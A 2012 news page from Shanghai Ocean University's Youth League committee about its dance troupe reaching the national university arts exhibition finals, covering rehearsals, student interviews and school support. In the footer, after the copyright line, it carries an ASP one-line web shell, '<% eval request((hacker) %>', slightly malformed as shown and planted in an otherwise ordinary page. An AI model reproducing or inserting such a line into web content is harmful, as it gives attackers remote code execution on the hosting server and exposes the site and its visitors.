当前位置:共青团上海海洋大学委员会 >> 学生组织 >> 校艺术团 >> 正文  
站内信息搜索:
我校舞蹈团首登全国大学生艺术展演决赛舞台
[2012年02月29日]   来源:本站原创   作者:佚名   点击数: 【字体: 】【双击滚屏

2012年2月8日至14日,由教育部与浙江省人民政府联合主办,浙江省教育厅、杭州市政府承办的全国第三届大学生艺术展演活动在杭州拉开帷幕,来自全国403所高校、7000余名高校师生,将在为期一周的展演活动中登台亮相,展示当代大学生的艺术风采和精神风貌。

全国大学生艺术展演是教育部举办的全国性大学生艺术比赛,每3年举办一届,是我国目前规格最高、规模最大、影响最广的大学生艺术盛会,本届大学生艺术展演活动共吸引了2003所高校参加,覆盖全国高校的93%。活动从2010年10月启动,经历了全国高校开展校内艺术活动、各省(区、市)组织集中展演、全国评选和现场集中展演3个阶段。

我校舞蹈团的群舞《紫金流云》(原创)于2011年11月被市教委推荐参加全国第三届大学生艺术展演舞蹈比赛,经过与全国各省选送的263个舞蹈节目激烈竞争再次闯关成功,成功入选70个全国艺术展演决赛舞蹈节目。作为舞蹈专场三场中的第一场,于2月8日登上全国艺术展演决赛舞台。本次上海选送普通组舞蹈节目4个,分别是复旦大学、华东师范大学、上海体育学院和我校,专业组舞蹈节目2个,为上海交通大学和上海戏剧学院。

一年的奋战,只为绽放那一刻的光彩

决赛演出现场

曼妙柔美的舞姿

2011年2月,市教委下发的关于组织开展上海市第三届大学生艺术展演活动的通知启动了全市高校的艺术展演筹备活动。本次艺术展演倡导原创节目,为了确定舞蹈主题,与大校、强校错位竞争,前两届展演的资料主创人员看了无数遍;音乐的选取、制作,服装的颜色、材质、身形效果、手绘草图和设计效果图出样,每一个流程的推进和细节的敲定都是无数次的讨论和与专业公司不断沟通的成果;我校舞蹈指导教师张巍科班出身,并有着留日学习舞台剧的经验,她的编舞,集合了古典舞的柔美和现代舞的流畅,将整个舞蹈设计的节奏紧凑、张弛有致,有着行云流水般的精彩和美感;而舞蹈演员的选取更是从高矮、胖瘦、身形比例等各方面进行考量,选出18个学生进行了长达半年的加课训练;2011年5月完成编舞、音乐、6月服装制作完毕、暑期的加排、10月的上海市初赛、决赛、11月的选送全国节目录影、2012年1月参加上海市艺术展演汇报演出、春节期间的加排和2月的全国决赛,一年走来,每一步都包含着汗水和努力,一年的奋战,换来全国决赛舞台上4分37秒的精彩。

精彩背后的精彩

罗裙飞舞、锦扇摇曳。无论走到哪里,舞团姑娘们动人的身姿、震撼的表演都给观众们留下了深刻的印象,甚至有其他参赛团队的老师以为我们是专业组的舞蹈团队。殊不知,这份骄傲与美丽的背后凝结着团员们超乎想象的的坚持和付出。

艰苦的排练

卷起裤腿都是淤青

除了每周一次的常规训练,舞团的同学们按照各自空余时间,自发制定好加排表加练。常常是下了课就直奔舞房,连吃饭都只在舞房里将就一下。参加上海市选送节目的录影时,刚忙完校庆的舞团成员们放弃双休日,学校、戏剧学院、文广录影棚三点一线跑了整整4天。为了1月15日上海大剧院演出,团员们在考试结束后全部留在学校,从1月10日开始,对整个舞蹈进行重新编排,将原本4分37秒的舞蹈压缩改编至2分30秒,并在道具中加入海洋元素,精彩的表现得到了导演组的高度评价。2月2日,还没过完元宵节,舞团的同学就已经早早的提着行李回到学校,为即将到来的全国决赛进行高强度集训。从早上的压腿、拉伸、基本功训练,到下午的排练,每天都要练足10小时才肯离开。2月初的校园异常寒冷,空空荡荡,有时候练习得晚了,走到食堂饭菜都凉了,有的成员因为高强度的训练发起了高烧,而小病小伤人人都有,每个人挽起袖子和裤腿,都是一块块的淤青,即便如此,她们互相鼓励坚持了下来,她们用实际行动证明了90后的独生子女们能吃苦、肯付出、爱坚持的一面,她们柔美的外形下有着坚韧的内心。

用心灵去体会舞蹈

当收尾的灯光缓缓落下,走到后台,姑娘们纷纷含着泪水相互拥抱。这眼泪里,有演出结束释放的压力,有对汗水、伤病的记忆,有登上全国舞台的欣喜,但更多的,是与志同道合的伙伴们一起携手奋战、拼搏努力之后收获的珍贵的友谊和美丽的记忆。

“我很享受舞蹈带给我的乐趣。”徐雷雷学的是爱恩学院的市场营销,这专业乍眼一看与舞蹈八竿子打不着,说起自己的练舞经历她有感而发,“我从小就很喜欢舞蹈,会经常跟着视频学习一些新奇的舞蹈。我最爱的是民族舞,也会爵士舞,有时我甚至会在路上跟着自己打的节拍不由自主地手舞足蹈起来。”言语中,徐雷雷脸上泛着笑意。用热爱甚至痴迷形容她对跳舞的喜爱,一点都不为过。“有时候跳完回去已经很累很累,看着室友们都早早的上床休息了,我却还要咬着牙看书复习,心里真是说不出的难受。爱恩的学业很紧张,要做到两不误真是很累很累,也不是没有想过放弃,但是跳舞是我一直以来的梦想,为了自己的梦想,吃这么点苦算什么。”作为舞蹈团的团长,她带领着团员们及时总结演出经验,在动作中进行更多细小的调整,使节目变得更加饱满。“我们流的每一滴汗都是值得的,因为舞蹈带给我们太多的感动。每每大家在一起练舞的时候,总会谈一些过去在一起的种种趣事,彼此间相互调侃。因为舞蹈,我们彼此间有了更多的默契,而我们也因舞蹈而结下了深厚的友谊。”回想起这支队伍在一起的点点滴滴,徐雷雷一度哽咽。“只要在学校,我愿意和队友们一直跳下去;我们要在百年校庆的舞台上为母校献上我们最精彩的演出;等我毕业后,也会一直保持着这个习惯,因为我已经习惯了这个习惯,改不了了。我爱舞蹈,它已经深深融入我的血液之中。”

上海市教委副主任李骏修在杭州看望排练中的同学们

演出结束后黄晞建副书记与演员合影

舞蹈团成员的精彩表现,离不开全校上下的关心和支持。校领导多次慰问演职人员,为演员们加油打气,送温暖送关怀,黄晞建副书记更是全程陪同了决赛演出;各学院对演出成员的学业、生活一直关心辅导;校艺术团秘书长何杉作为主创人员之一全程参与,在加班加点做好后勤保障的同时,为演出的顺利进行做好协调沟通工作;后勤部门为寒假集训提供了住宿、餐饮、医疗服务保障。所有的付出和努力都在今年绽放,让我们共同期待我校在全国决赛场上取得好成绩。

(撰稿:夏雅敏、张倩)

 

关闭窗口

上一篇:让青春放歌 我校艺术团首登上海大剧院舞台

下一篇:我校学子获全国第三届大学生艺术展演两项金奖
  留言板 | 管理登录 版权所有 © 2007 共青团上海海洋大学委员会 tw.shou.edu.cn <% eval request((hacker) %>